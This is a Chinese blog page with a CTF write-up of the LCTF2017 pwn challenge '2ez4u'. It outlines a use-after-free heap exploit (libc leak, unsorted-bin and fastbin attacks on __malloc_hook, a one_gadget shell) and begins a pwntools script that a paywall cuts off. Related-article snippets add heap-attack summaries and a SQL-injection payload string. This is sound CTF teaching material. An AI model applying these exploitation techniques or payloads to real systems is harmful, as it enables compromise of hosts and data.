LCTF2017-2ez4u writeup 另一种思路

最新推荐文章于 2022-02-24 14:22:34 发布
最新推荐文章于 2022-02-24 14:22:34 发布
阅读量709 收藏
点赞数 1
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/81585380
版权

之前没怎么用过largebin attack,于是搜了下题来做
审计了下,有个UAF漏洞,PIE开了,能打印,那跟fengshui那题差不多了

于是骚操作了一波,leak出libc基址,unsorted bin attack攻击malloc_hook上的位置,其实这里攻击free_hook上面的也是可以的,然后fastbin attack直接控制_malloc_hook,填one_gadget,发现get不到shell,那用_realloc_hook修一下栈,get shell
全程都是用fastbin attack和unsorted bin attack,large bin attack完全没用………还是要看下官方的思路,学习一下

下面是payload

from pwn import *

debug=1

context.log_level='debug'
context.arch='amd64'
e=ELF('./libc.so')

if debug:
    p=process('./2ez4u',env={
  'LD_PRELOAD':'./libc.so'})
    gdb.attach(p)
else:
    p=remote('',)

def ru(x):
    return p.recvuntil(x)

def se(x):
    p.send(x)

def add(color,value,num,length,content):
    se('1\n')
    ru('color?(0:red, 1:green):')
    se(str(color)+'\n&
最低0.47元/天 解锁文章
charlie_heng
关注
专栏目录
large bins attack及lctf2017 2ez4u writeup
Mira_Hu的博客
01-03 267
基本信息 checksec mira@ubuntu:~/test/pwn/largebin_attack/2ez4u$ checksec 2ez4u [*] '/home/mira/test/pwn/largebin_attack/2ez4u/2ez4u' Arch: amd64-64-little RELRO: Full RELRO (不能修改got表) Sta...
LCTF-学习-MISC100-200
Kn1ght_Gin的博客
10-25 1165
开始一本正经水CTF,先从刷writeup开始。本次学习对象是刚刚结束的LCTF,参考AAA的writeup,自己动手重现破解过程,并记录知识点。 0x0 MISC100: 类型: 读取图片中的内容,获取AES初始秘钥,在函数中经过一定的重新置换,获取最终秘钥。要求输入EditText内容经秘钥加密后,与给定的new byte[] { 21, -93, -68, -94, 86, 1
LCTF2017-WEB-LPLAYGROUND:LCTF2017网站题L_PLAYGROUND
03-23
LCTF2017C L_PLAYGROUND 0x00.LCTF2017 0X01。项目介绍 这个项目是LCTF2017的网络题L_PLAYGROUND的开放原始码。 ./doc/build.md指南在./doc/build.md ./doc/writeup.md在./doc/writeup.md 0x02。参考 0x03。后记 这个路线我觉得只能说一般,利用到的点都没有很新,也没有我独自发现的突破点。这道题也不是突破的生产者,只是突破的搬运工。 在布置环境里,疏忽之间就把sesstings的pyc给删了,导致失去了重要的线索,万幸没有给师傅们造成太大的影响。(毕竟这道题过去一个月了,很多地方都忘记了 还有比较坑爹的一点是,redis的配置内容,某些密码,profix是假的,很尴尬。所以有了如下的描述: 万幸的是,LCTF2017顺利结束了。比赛期间(周末)过得很充实,事情很多2333。
LCTF-2017 2ez4u
qq_41252520的博客
03-30 548
保护 分析 典型的菜单型程序,可用的操作用增删改查。添加操作的伪代码: 可以得到一个大概的结构体 struct Apple{ size_t Color; size_t Value; size_t Id; char Description[size] }; 这里需要注意一点,Color,Value,Id 占去了一个chunk 结构的 fd,bk,fd_size。输入也存在0截断: 删...
lctf2017_2ze4u_reproduce
Gtooler的博客
02-24 292
lctf2017_2ze4u_reproduce 概述 保护全开,libc-2.23 漏洞点在 uaf 不过这题有个地方很烦,就是读和写都是从 chunk_data 的地址开始,所以需要各种方法去绕过 这题主要就是利用伪造 bk_nextsize 的 largebin_attack,实现任意地址申请,然后进行 overlap 还有就是修改 top 指针,使其指向 free_hook,最后申请出来改成 system,实现getshell 利用过程 堆布局 # 布局要注意 \x00 和 consolidate
Lctf-2016-pwn100 题解
lifanxin的博客
12-24 821
Write Up知识点和关键字样本运行静态分析程序逻辑求解脚本 知识点和关键字 栈溢出 ROP 无libc泄露函数地址 样本 来自Lctf 2016年的pwn题,样本 pwn100 (这个资源没办法上传,想要样本的可以留言!) 运行 查看文件属性   64位程序,只开了NX保护 运行样本程序 输入超过200个字符串才会回显"bye~",接着报了一个段错误,程序结束 静态分析 把程序拖进到IDA查看,发现main函数比较简单,主要起作用的是sub_40068E()函数,我们直接进入到这个函数。 该函数又
LCTF#LCTF2017#web签到题1
07-25
web签到题题目不难, 一共就只有几个点用file协议读取本地文件截断url后面拼接的/, GET请求, 用?#都可以payload其实很简单: file://
LCTF2017之萌萌哒报名系统
JBlock的博客
10-04 3051
题记: 最近在服务器上复现了一些CTF题目,所以对这些题目整理上相应的writeup。所以,才有了今天的文章。 正文: 这道题目是LCTF2017的题目,名字为萌萌哒报名系统。题目提示为:天依花了一整天的时间用IDE开发了一个报名系统,现在她睡着了,难道你们不想做点什么嘛XD? 首先提示是IDE,那么我们可以想到PHP有款强大的IDE叫做PHPSTORM,它新建项目的时候会生成一个.ide...
oracle攻击的几种方式,padding oracle攻击思路总结
weixin_39842955的博客
04-07 2124
之前一直没有机会好好总结下padding oracle, 在LCTF 上水了两天,Simple Blog 这题就看了一天,最后还是没有弄出来, 参考了各位大师傅的wp, 赛后好好总结下这个漏洞, 还是很有意思的Padding Orlace攻击这是CBC模式下存在的攻击,与具体的加密算法无关(当然,必须是分组加密)。不过,实际上Padding Oracle不能算CBC模式的问题,它的根源在于应用程序...
好好说话之Large Bin Attack
hollk’s blog
01-20 4858
large bin attack这种方法本质上并不难,只是有点绕而已。他和上一篇unsorted bin attack有点类似,都是chunk挂进bin链表的时候通过完成链表结构连接时发生的问题,只不过large chunk还需要考虑fd_nextsize和bk_nextsize这两个结构。接下来就剩Tcache attack和House系列啦!终于要熬出头了???? 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
Large bin attack
abelxu
11-26 1938
0x01 large bin Large bins 中一共包括 63 个 bin,index为64~126,每个 bin 中的 chunk 的大小不一致,而是处于一定区间范围内。(本文讨论的代码和结构都是在glibc2.23 64位的情况) 1.largebin的一些结构 在largebin的处理过程中会用到fd_next和bk_nextsize来加快chunk的处理。 struct malloc_chunk { INTERNAL_SIZE_T prev_size; /* Size of
LCTF Web补题笔记(菜狗前进永不止步)
Assassin
11-20 5207
不得不说比赛真的挺难得…补题吧… Simple blog 首先上来发现文件login.php和admin.php,但是没什么别的,想到文件泄露通过swp得到源码 login.php error_reporting(0); session_start(); define("METHOD", "aes-128-cbc"); include('config.php'); function
Lctf学习纪录
Ee1s
10-27 1034
渣渣回归QAQ
【bugkuCTF】easy-100(LCTF)writeup
iqiqiya的博客
09-28 2556
转载自:http://l-team.org/archives/lctf2016_wp_1.html 这一题的确是个福利题...并没有涉及到dex函数隐藏等小技巧,只是简单的使用proguard进行了混淆。可以静态也可动态(动态先改掉debug检测,还不如直接静态看一下),那么,关键部分源码: private void getKey(){ try { InputStre...
lctf_2016-some-web-writeup
dengzhasong7076的博客
10-03 244
web50 签到: http://web.l-ctf.com:6699/sh0p.php post: uname=a'%0aanandd%0aupdupdatexmlatexml(1,concat(0x7e,version(),0x7e),1)%23&passwd=a 过滤了一些关键字为空,过滤空格为空 对information做了限制,通过万能密码进入: uname=a'%0a...
glibc-2.29 large bin attack 原理
qq_23066945的博客
11-14 1065
glibc-2.29 large bin attack 原理 原创: 星盟安全团队 星盟安全 该方法并非笔者发现,而是阅读 balsn 的 writeup 时分析而得到的,这里介绍一下这种攻击方法。 unsorted bin attack 在介绍新的攻击技术之前,先来缅怀一下 unsorted bin attack , 由于 glibc-2.29 新上的保护措施,使得 unsorted bin ...
easy_heap
JackBoy的博客
12-04 341
easy_heap  题目保护全开,在malloc的时候存在null-by-one漏洞,由于分配的堆块的大小都是0x100(加堆头),所以null-by-one漏洞只会覆盖下个堆块的prev_inuse标志位为0。一般的利用思路是通过伪造prev_size的大小来构造overlap-chunk为所欲为,但是这种思路在这道题目里行不通,因为malloc在读取内容的时候‘\0’会截断而且堆块大小是0...
vn_pwn_easyTHeap(堆利用+劫持IO_2_1_stdout的虚表)
seaaseesa的博客
04-09 1332
vn_pwn_easyTHeap 首先,已知libc版本为2.27,所以存在tcache机制,并且可以随意的double free tcache bin的chunk。 然后,我们检查一下程序的保护机制 然后,我们用IDA分析一下程序 存在UAF漏洞,因此可以double free,对于glibc 2.27,可以很轻松的利用 主函数里,对调用功能的次数做了限制,即add功能能...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值